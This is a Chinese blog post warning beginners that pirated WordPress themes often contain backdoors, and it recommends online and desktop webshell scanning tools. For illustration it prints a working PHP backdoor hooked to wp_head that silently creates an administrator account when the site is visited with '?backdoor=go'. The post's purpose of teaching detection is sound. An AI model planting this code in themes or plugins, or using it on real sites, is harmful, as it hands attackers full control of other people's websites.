技术教程: 建站必备-网站后门查杀工具推荐

搜刮好东西分享简介:前面搜刮分享过几篇文章,是有关于网上众多流传的wordpress主题里被加入了后门,大家可以回顾下《技术教程:网传justnews 5.2.3破解版后门分析》《技术教程:小心WordPress盗版主题里暗藏后门 干货》。对于此类行为,搜刮严重鄙视这些给程序加后门的人。对于一个新手菜鸟,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美破解、无后门等标签来吸引小菜鸟购买,实际上里面不知道加了多少料,最常见的代码如下:

add_action(‘wp_head’, ‘creatbackdoor’);
function creatbackdoor() {
If ($_GET[‘backdoor’] == ‘go’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘username’, ‘password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}
将 username 和 password 分别为创建的管理员用户名和密码,所创建的后门地址为:http://你的网站域名/?backdoor=go,然后就可以为所欲为了!

当然,后门代码还有很多种,有一些还会经过特殊加密,比如有时候会出现类似 34d1f91fb2e514b8576fab1a75a89a6b 这种乱码,基本就可以断定你的这个主题包加了东西!所以搜刮建议菜鸟们在购买主题或者插件时,尽量不要购买有加密代码的源码,认准官方正版或选择开源的程序,不要相信所谓的完美坡姐之类的话,之前网上流传的号称完美破解版的 justnews和 ripro主题基本都有这种肮脏的代码,导致很多小白的博客数据全丢!

在此搜刮推荐几个网站后门查杀工具供小白们使用。

1. 在线扫描
1) 河马在线查杀:http://n.shellpub.com
这个比较方便,支持 zip 文件压缩包直接上传扫描,当然上传的文件大小不能超过 20MB ,同时支持 asp/php/aspx/jsp/perl 等各种脚本。

2) 百度在线查杀:https://scanner.baidu.com
这个比较厉害,支持 zip、rar、tar 等各种常见压缩包,同时支持 php/jsp/asp/aspx 等各种脚本,也支持通过 API 方式进行扫描,文字咖之前一直使用这个,就是速度有点慢。。。

2) CHIP 在线查杀:https://phpchip.com
这个仅支持 PHP 且只能上传单个 PHP 文件进行扫描。

4) 在线 webshell 查杀-灭绝师太版:http://tools.bugscaner.com/killwebshell/
这个目前支持 zip 或 php 文件上传扫描,但是 zip 压缩包大小不能超过 2M。

2. 客户端扫描
1) 河马查杀
河马同时支持 Windows 和 Linux 两种客户端查杀工具,这里有个比较有意思的地方就是,河马查杀新增了一个机器学习查杀引擎,只是目前处于试验阶段,感兴趣的小伙伴可以去体验一下!

2) D 盾防火墙(强烈推荐)
文字咖最喜欢用的就是这个,可以直接在 Windows 的环境下,使用 D 盾将网站源码或疑似木马文件下载回本地扫描,非常快捷方便。

3) WebShellKiller
大名鼎鼎的深信服发布 webshell 查杀工具,也可以在 Windows 环境下直接选择需要扫描的文件夹开始扫描即可,也是非常方便好用的 webshell 查杀工具。

3. 总结
虽然在这里推荐了几种网站后门查杀工具,但对于那些以正规建站为目的,希望能够做大站长的同学,还是尽量购买正版主题。当然对于那些喜欢折腾的小伙伴,尽量使用非加密的的主题,毕竟某宝等平台上出售的非正版源码存在安全问题的可能性是非常大的,最后总结就是,遇到一些乱码的源码主题不用,多学习,觉得有安全问题就是用搜刮推荐的几种查杀工具检查一下!

wordpress教程

WordPress教程:纯代码无插件实现WordPress文章内容登录可见

2020-10-30 7:52:51

wordpress教程

建站软件:Windows Live Writer 离线发布WordPress文章

2020-10-31 18:09:41

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索
  客服QQ:169403068